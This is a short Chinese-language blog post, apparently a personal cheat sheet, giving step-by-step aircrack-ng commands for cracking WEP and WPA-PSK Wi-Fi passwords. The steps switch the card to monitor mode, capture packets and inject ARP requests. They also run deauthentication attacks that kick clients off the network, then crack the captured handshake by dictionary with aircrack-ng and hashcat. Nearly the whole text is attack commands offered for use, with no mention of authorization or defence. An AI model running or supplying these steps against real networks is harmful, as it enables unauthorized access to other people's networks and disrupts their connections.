aircrack-ng破解wifi密码

破解WEP加密无线网络

1、激活无线网卡至monitor即监听模式
   airmon-ng start wlan0

2、探测无线网络,抓取无线数据包
   airodump-ng mon0 
   airodump-ng --ivs(默认为cap) –w 保存的文件名 -c 6(信道) wlan0mon

3、对目标AP使用ArpRequest注入攻击
   aireplay-ng -3 -b AP的mac -h 客户端的mac wlan0mon

4、打开aircrack-ng,开始破解WEP
   aircrack-ng 捕获的ivs文件

破解WPA-PSK加密无线网络

1、激活无线网卡至monitor即监听模式
ifconfig –a 查看无线网卡状态
ifconfig wlan0 up 载入无线网卡驱动
airmon-ng start wlan0 激活网卡到monitor模式

2、探测无线网络,抓取无线数据包
airodump-ng mon0 
airodump-ng -c 3 --bssid F0:B4:29:29:8A:03 -w crack wlan0mon
或者airodump-ng --ivs(默认为cap) –w 保存的文件名 -c 6(信道) wlan0mon

3、进行Deauth攻击加速破解过程
aireplay-ng -0 10 -a AP的mac -c 客户端的mac wlan0mon

4、开始破解WPA-PSK
aircrack-ng -w dic(字典) 捕获的cap文件

4.1、用hashcat破解先把cap变成hccap文件
aircrack-ng <out.cap> -J <out.hccap>
hashcat -m 2500 out.hccap.hccap dics.txt

遇到特殊情况

万事开始前:airmon-ng check kill
重启网卡(如果出问题执行这个)
具体 Kali2.0 上的操作方法:
sudo ifconfig wlan0mon down
sudo iwconfig wlan0mon mode monitor
sudo ifconfig wlan0mon up
sudo iwconfig wlan0mon

发表评论

电子邮件地址不会被公开。 必填项已用*标注